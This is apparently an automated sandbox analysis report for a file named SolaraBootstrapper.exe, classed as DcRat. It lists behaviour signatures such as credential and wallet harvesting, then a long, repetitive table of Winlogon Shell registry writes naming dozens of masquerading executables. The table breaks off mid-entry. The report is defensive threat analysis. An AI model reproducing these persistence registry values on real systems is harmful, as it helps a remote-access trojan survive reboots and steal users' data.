Analysis Overview
SHA256
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Threat Level: Known bad
The file SolaraBootstrapper.exe was found to be: Known bad.
Malicious Activity Summary
DcRat
DCRat payload
Dcrat family
Process spawned unexpected child process
Modifies WinLogon for persistence
Event Triggered Execution: AppInit DLLs
Command and Scripting Interpreter: PowerShell
.NET Reactor proctector
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Enumerates connected drives
Blocklisted process makes network request
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-21 20:15
Signatures
DCRat payload
Dcrat family
.NET Reactor proctector
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-21 20:15
Reported
2024-07-21 21:59
Platform
win7-20240708-en
Max time kernel
1800s
Max time network
1804s
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\"" | 
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program 
Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program 
Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", 